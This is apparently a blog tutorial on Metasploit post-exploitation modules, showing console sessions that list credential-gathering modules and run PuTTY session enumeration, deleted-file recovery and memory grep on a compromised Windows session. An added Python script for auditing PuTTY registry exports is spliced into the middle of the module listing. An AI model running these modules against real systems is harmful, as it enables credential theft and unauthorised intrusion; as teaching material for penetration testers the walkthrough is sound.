8/07/2017

[MAD-METASPLOIT] 0x33 - Using post module





Finding post modules


HAHWUL exploit(easyfilesharing_post) > search type:post platform:windows

Matching Modules
================

   Name                                                    Disclosure Date  Rank       Description
   ----                                                    ---------------  ----       -----------
   post/multi/gather/apple_ios_backup                                       normal     Windows Gather Apple iOS MobileSync Backup File Collection
   post/multi/gather/check_malware                                          normal     Multi Gather Malware Verifier
   post/multi/gather/dbvis_enum                                             normal     Multi Gather DbVisualizer Connections Settings
   post/multi/gather/dns_bruteforce                                         normal     Multi Gather DNS Forward Lookup Bruteforce
   post/multi/gather/dns_reverse_lookup                                     normal     Multi Gather DNS Reverse Lookup Scan
   post/multi/gather/dns_srv_lookup                                         normal     Multi Gather DNS Service Record Lookup Scan
   post/multi/gather/enum_vbox                                              normal     Multi Gather VirtualBox VM Enumeration
   post/multi/gather/env                                                    normal     Multi Gather Generic Operating System Environment Settings
   post/multi/gather/filezilla_client_cred                                  normal     Multi Gather FileZilla FTP Client Credential Collection
   post/multi/gather/find_vmx                                               normal     Multi Gather VMWare VM Identification
   post/multi/gather/firefox_creds                                          normal     Multi Gather Firefox Signon Credential Collection
   post/multi/gather/jboss_gather                                           normal     Jboss Credential Collector
   post/multi/gather/lastpass_creds                                         normal     LastPass Vault Decryptor
   post/multi/gather/multi_command                                          normal     Multi Gather Run Shell Command Resource File
   post/multi/gather/pgpass_creds                                           normal     Multi Gather pgpass Credentials
   post/multi/gather/pidgin_cred                                            normal     Multi Gather Pidgin Instant Messenger Credential Collection
   post/multi/gather/ping_sweep                                             normal     Multi Gather Ping Sweep
   post/multi/gather/resolve_hosts                                          normal     Multi Gather Resolve Hosts
   post/multi/gather/run_console_rc_file                                    normal     Multi Gather Run Console Resource File
   post/multi/gather/skype_enum                                             normal     Multi Gather Skype User Data Enumeration
   post/multi/gather/thunderbird_creds
...snip...




Finding PuTTY sessions

post/windows/gather/enum_putty_saved_sessions


HAHWUL exploit(easyfilesharing_post) > use post/windows/gather/enum_putty_saved_sessions
HAHWUL post(enum_putty_saved_sessions) > show options

Module options (post/windows/gather/enum_putty_saved_sessions):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

HAHWUL post(enum_putty_saved_sessions) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
HAHWUL post(enum_putty_saved_sessions) > set SESSION 2
SESSION => 2
HAHWUL post(enum_putty_saved_sessions) > run

[*] Looking for saved PuTTY sessions
[-] No saved sessions found

[*] Looking for previously stored SSH host key fingerprints
[-] No stored SSH host keys found

[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed
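The module above reads PuTTY's registry hive for saved sessions and stored SSH host keys. As an added example that is not from the original post or from Metasploit, this Python script pulls the same information from a .reg export of HKCU\Software\SimonTatham\PuTTY (a constructed sample is embedded), so a defender can audit a host offline for saved sessions and clear-text proxy passwords. The registry paths and the %XX escaping of session names are PuTTY's documented behaviour; the sample data and helper names are assumptions.

```python
# Added example, not code from the post or from Metasploit: parse a .reg export
# of PuTTY's registry hive and list what enum_putty_saved_sessions collects.
from urllib.parse import unquote

BASE = r"HKEY_CURRENT_USER\Software\SimonTatham\PuTTY"  # PuTTY's documented hive
# Constructed sample export (not real data). PuTTY %XX-escapes session names.
SAMPLE_REG = r'''
[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\prod%20db]
"HostName"="db01.example.internal"
"PortNumber"=dword:00000016
"UserName"="dba"
"ProxyPassword"="s3cret"
[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\jump]
"HostName"="jump.example.internal"
"PortNumber"=dword:0000082a
[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]
"rsa2@22:db01.example.internal"="0x10001,0xc0ffee"
'''

def parse_reg(text):
    # {key_path: {value_name: raw_value}}; only [key] and "name"=value lines matter
    keys, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = value
    return keys

def reg_value(raw, default=""):
    # "str" -> str, dword:hex -> int, missing -> default
    if raw is None:
        return default
    return int(raw[6:], 16) if raw.startswith("dword:") else raw.strip('"')

def enum_putty(text):
    # Returns (saved sessions, stored host-key names), the two things the module looks for
    keys, prefix = parse_reg(text), BASE + "\\Sessions\\"
    sessions = [{
        "name": unquote(path[len(prefix):]),
        "host": reg_value(vals.get("HostName")),
        "port": reg_value(vals.get("PortNumber"), 22),
        "user": reg_value(vals.get("UserName")),
        # PuTTY stores ProxyPassword unencrypted; flag sessions that keep one
        "proxy_password": bool(reg_value(vals.get("ProxyPassword"))),
    } for path, vals in keys.items() if path.startswith(prefix)]
    return sessions, sorted(keys.get(BASE + r"\SshHostKeys", {}))
```

Sessions flagged with proxy_password set are the ones worth clearing, since the module (and anyone else with the user's registry) reads that value directly.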


   post/windows/gather/forensics/browser_history                            normal     Windows Gather Skype, Firefox, and Chrome Artifacts
   post/windows/gather/forensics/duqu_check                                 normal     Windows Gather Forensics Duqu Registry Check
   post/windows/gather/forensics/enum_drives                                normal     Windows Gather Physical Drives and Logical Volumes
   post/windows/gather/forensics/imager                                     normal     Windows Gather Forensic Imaging
   post/windows/gather/forensics/nbd_server                                 normal     Windows Gather Local NBD Server
   post/windows/gather/forensics/recovery_files                             normal     Windows Gather Deleted Files Enumeration and Recovering


File recovery module


HAHWUL post(driver_loader) > use  post/windows/gather/forensics/recovery_files
HAHWUL post(recovery_files) > show options

Module options (post/windows/gather/forensics/recovery_files):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DRIVE    C:               yes       Drive you want to recover files from.
   FILES                     no        ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files.
   SESSION                   yes       The session to run this module on.
   TIMEOUT  3600             yes       Search timeout. If 0 the module will go through the entire $MFT.

HAHWUL post(recovery_files) > set SESSION 2
SESSION => 2
HAHWUL post(recovery_files) > run

[*] System Info - OS: Windows 7 (Build 7601, Service Pack 1)., Drive: C:
[*] $MFT is made up of 1 dataruns
[*] Searching deleted files in data run 1 ...


Memory grep


post/windows/gather/memory_grep

HAHWUL post(recovery_files) > use post/windows/gather/memory_grep
HAHWUL post(memory_grep) > show options

Module options (post/windows/gather/memory_grep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HEAP     false            no        Grep from heap
   PROCESS                   yes       Name of the process to dump memory from
   REGEX                     yes       Regular expression to search for with in memory
   SESSION                   yes       The session to run this module on.





HAHWUL

Security engineer, Gopher and H4cker!
